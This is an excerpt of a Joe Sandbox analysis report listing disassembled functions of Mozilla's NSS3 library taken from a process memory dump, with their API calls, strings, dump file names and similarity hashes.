Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

Strings

9VPm, xrefs: 6D558986

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID: 9VPm
API String ID: 2759447159-1307474564
Opcode ID: 151aa7e20544f2b76b1a23dafe30b53859d05c4ebb623f92d171056bb626ffee
Instruction ID: e5b826559388a42049b93b85a69317820c4928fda9e20cdec448d1f3737cde73
Opcode Fuzzy Hash: 151aa7e20544f2b76b1a23dafe30b53859d05c4ebb623f92d171056bb626ffee
Instruction Fuzzy Hash: C7217CB4814606CBCB02EF69C485669BBF0BF46314F014A6ADD9896611E730E8A0CBD3

Function 6D612C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6D612CA0
PR_ExitMonitor.NSS3 ref: 6D612CBE
calloc.MOZGLUE(00000001,00000014), ref: 6D612CD1
strdup.MOZGLUE(?), ref: 6D612CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6D612D27

Strings

Loaded library %s (static lib), xrefs: 6D612D22

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 7d6bb921a682e1b6f005a4acc058c97d1b56fd2ad458a4543eded528b6f36593
Instruction ID: c049c1b0e9b91f256f9546ccccc7ddbb2d141ae1071542dde1871d02cda8e970
Opcode Fuzzy Hash: 7d6bb921a682e1b6f005a4acc058c97d1b56fd2ad458a4543eded528b6f36593
Instruction Fuzzy Hash: FE11E6B55482409FEB24CF1ADC41B7677B4AB8E349F04C02DDA0AC7342D7319814CB92

Function 6D50BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6D50BDCA

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D50BDDB

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D50BDEC

Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6D50BE03

Part of subcall function 6D55FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D558D2D,?,00000000,?), ref: 6D55FB85
Part of subcall function 6D55FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D55FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6D50BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6D50BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D50BE3B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 5040e71206831ee5ab6643e17b87f32535c4b95e472c1f189f77e8ced7f42bcf
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: 65012BA5A4421167FB1826667C01F3B76884F9029DF090031FF04DAA82FB50D91082B7

Function 6D560FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016

Part of subcall function 6D5C98D0: calloc.MOZGLUE(00000001,00000084,6D4F0936,00000001,?,6D4F102C), ref: 6D5C98E5

PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B
TlsGetValue.KERNEL32(00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561044
free.MOZGLUE(00000000,?,00000800,6D4FEF74,00000000), ref: 6D561064

Strings

security, xrefs: 6D561025

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: a21f479db359167a17224669de65875cb41751fc9c3d59ca63d88c6873323fec
Instruction ID: 75493073e6473f5675d454c3471988cc84d822a9843702ac40336b5afef07268
Opcode Fuzzy Hash: a21f479db359167a17224669de65875cb41751fc9c3d59ca63d88c6873323fec
Instruction Fuzzy Hash: BB0148319402D297EF21AF2E8C05F363A78BF86766F024919E90897971EB618540CBF2

Function 6D591C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6D591C74

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

DeleteCriticalSection.KERNEL32(?), ref: 6D591C92
free.MOZGLUE(?), ref: 6D591C99
DeleteCriticalSection.KERNEL32(?), ref: 6D591CCB
free.MOZGLUE(?), ref: 6D591CD2

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: 6f5fb6d0a5965a405c27a1bedb73e65923a6618f51931203f5f4de4d4a373fa4
Instruction ID: 36f9756fa0666ebc2ea415fe69333c2b3c4d47e1ca54cc5a366fdde44e7a3536
Opcode Fuzzy Hash: 6f5fb6d0a5965a405c27a1bedb73e65923a6618f51931203f5f4de4d4a373fa4
Instruction Fuzzy Hash: 2901F5B1C442B1AFEF38DFB6DD09F6A3BBCAB0A304F040424EA0A96B40D77590558792

Function 6D5A49C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000678,?,?,6D595F34,00000A20), ref: 6D5A49EC

Part of subcall function 6D55FAB0: free.MOZGLUE(?,-00000001,?,?,6D4FF673,00000000,00000000), ref: 6D55FAC7

SECITEM_ZfreeItem_Util.NSS3(?,00000000,6D595F34,00000A20,?,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D5A49F9
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6D595F34,00000A20,?,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D5A4A06
free.MOZGLUE(?,?,?,?,?,6D595F34,00000A20), ref: 6D5A4A16
free.MOZGLUE(?,?,?,?,?,6D595F34,00000A20), ref: 6D5A4A1C

Strings

4_Ym , xrefs: 6D5A49C6, 6D5A4A21

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Item_UtilZfreefree
String ID: 4_Ym
API String ID: 2193358613-389114341
Opcode ID: 1db1a623fa0ad37f5050decb80c8f51bcb53ca4540fdf0be5728d6fc260aa4a7
Instruction ID: 43c64d19c4ee71834a5f6808cf63b18902d0ddf088b3e9ac70edb9b2ff639bb7
Opcode Fuzzy Hash: 1db1a623fa0ad37f5050decb80c8f51bcb53ca4540fdf0be5728d6fc260aa4a7
Instruction Fuzzy Hash: B6017CB69001149FCB04CF65DCC4C567BBCEF8A20934984A6E90DCB602E732ED14CBB1

Function 6D61C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(00000000,6D591AB6,00000000,?,?,6D5907B9,?), ref: 6D61C9C6
free.MOZGLUE(?,?,6D5907B9,?), ref: 6D61C9D3
DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6D61C9E5
free.MOZGLUE(?), ref: 6D61C9EC
DeleteCriticalSection.KERNEL32(00000080), ref: 6D61C9F8
free.MOZGLUE(?), ref: 6D61C9FF
free.MOZGLUE(00000000), ref: 6D61CA0B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 3a62e4f7c7db2c3f9f7fd701bf9a7a35a9fd3df8c75b77ca1d147b2547de5dcc
Instruction ID: cf991a6c2e9fdee2c3048786c8169be0992fd8eb2d4102ad0678e8e514bdf270
Opcode Fuzzy Hash: 3a62e4f7c7db2c3f9f7fd701bf9a7a35a9fd3df8c75b77ca1d147b2547de5dcc
Instruction Fuzzy Hash: 69014FB2400606ABDB00DFB5CC48D57B7BCFE492617050525E907C3600D736F4A9CBE1

Function 6D5A2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6D5A3046

Part of subcall function 6D58EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6D58EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6D577FFB), ref: 6D5A312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D5A3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6D5A2E8B

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

Part of subcall function 6D58F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6D579BFF,?,00000000,00000000), ref: 6D58F134

memcpy.VCRUNTIME140(8B3C75C0,?,6D577FFA), ref: 6D5A2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D5A317B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: ecd19154b4b44da932a2b8d21787518c2a4cf3a78f3e09e961863d60e6fd162c
Instruction ID: f13ec1a6f04f8f598065fcad0a4bd931f74af41cedac1b17b41347559af80370
Opcode Fuzzy Hash: ecd19154b4b44da932a2b8d21787518c2a4cf3a78f3e09e961863d60e6fd162c
Instruction Fuzzy Hash: 79A1AB71A042299FDB28CF54CC81BAEB7B5EF89304F058099E949A7741E731AD85CF52

Function 6D55A970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7745b8232bd7a9c51ec8608f38df3a73ab1949524d75d1f3eb1a9d8ece5a1093
Instruction ID: ae861d10679f05092e11ee1bfd861ae4cb97b56cc819334817971f14fba15eb0
Opcode Fuzzy Hash: 7745b8232bd7a9c51ec8608f38df3a73ab1949524d75d1f3eb1a9d8ece5a1093
Instruction Fuzzy Hash: F7914F30D0816D8FCB2FCE188891BF977B5AF4A304F0588D7C59997A01D6316DA1CBB1

Function 6D56ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6D56ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6D56EDCE

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

free.MOZGLUE(00000000,?,?,?,?,6D56B04F), ref: 6D56EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D56EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D56EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6D56EEFB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: db4e4f6ebea3439d06ab7f8f7b1cdc7e9f63728dd2a877a3e40d8d99ab77619a
Instruction ID: b2701ca2df0f24091dd52335242affa62b0ca9a25747b54ee60cdfe951cd9a76
Opcode Fuzzy Hash: db4e4f6ebea3439d06ab7f8f7b1cdc7e9f63728dd2a877a3e40d8d99ab77619a
Instruction Fuzzy Hash: 988169B1A012469FEB18CF59CC84A7AB7F5BF89304F048828E915DB661DB31EC54CBB1

Function 6D56CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6D56C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6D56DAE2,?), ref: 6D56C6C2

PR_Now.NSS3 ref: 6D56CD35

Part of subcall function 6D5C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DC6
Part of subcall function 6D5C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DD1
Part of subcall function 6D5C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D5C9DED

Part of subcall function 6D556C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6D501C6F,00000000,00000004,?,?), ref: 6D556C3F

PR_GetCurrentThread.NSS3 ref: 6D56CD54

Part of subcall function 6D5C9BF0: TlsGetValue.KERNEL32(?,?,?,6D610A75), ref: 6D5C9C07

Part of subcall function 6D557260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6D501CCC,00000000,00000000,?,?), ref: 6D55729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6D56CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6D56CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6D56CE2C

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6D56CE40

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

Part of subcall function 6D56CEE0: PORT_ArenaMark_Util.NSS3(?,6D56CD93,?), ref: 6D56CEEE
Part of subcall function 6D56CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6D56CD93,?), ref: 6D56CEFC
Part of subcall function 6D56CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6D56CD93,?), ref: 6D56CF0B
Part of subcall function 6D56CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6D56CD93,?), ref: 6D56CF1D

Part of subcall function 6D56CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6D56CD93,?), ref: 6D56CF47
Part of subcall function 6D56CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6D56CD93,?), ref: 6D56CF67
Part of subcall function 6D56CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6D56CD93,?,?,?,?,?,?,?,?,?,?,?,6D56CD93,?), ref: 6D56CF78

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: fdb9c1b45649ad85364492dab390eb41a0d594b2464187d1119df8cca3a36d47
Instruction ID: 59bb6bde7d81ebe63f3d8f12fd935f6f27b1fb105402829845c423dd8608d750
Opcode Fuzzy Hash: fdb9c1b45649ad85364492dab390eb41a0d594b2464187d1119df8cca3a36d47
Instruction Fuzzy Hash: BC51B1B6A042419BEF19CF68DC40BBA7BF4AF88344F110825D959A7760EB31ED50CBA1

Function 6D57FFD0 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD076,00000000), ref: 6D57FFE5

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_EnterMonitor.NSS3(?), ref: 6D580004
PR_EnterMonitor.NSS3(?), ref: 6D58001B

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: EnterMonitor$ErrorValue
String ID:
API String ID: 3413098822-0
Opcode ID: 400290505b9d0f990ce2f516e5053e6032f64046dfa71c30a27a50c1cd942c4b
Instruction ID: 70441bb5e5dffb9e92c6b6dd60a81863088ed690141cd9b9602c1be00835ab4a
Opcode Fuzzy Hash: 400290505b9d0f990ce2f516e5053e6032f64046dfa71c30a27a50c1cd942c4b
Instruction Fuzzy Hash: EA416974209620CFE7388A2EDC517BB72A1EB4131BF40083FD556CAE96E375E545C642

Function 6D53EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6D53EF38

Part of subcall function 6D529520: PK11_IsLoggedIn.NSS3(00000000,?,6D55379E,?,00000001,?), ref: 6D529542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6D53EF53

Part of subcall function 6D544C20: TlsGetValue.KERNEL32 ref: 6D544C4C
Part of subcall function 6D544C20: EnterCriticalSection.KERNEL32(?), ref: 6D544C60
Part of subcall function 6D544C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6D544CA1
Part of subcall function 6D544C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6D544CBE
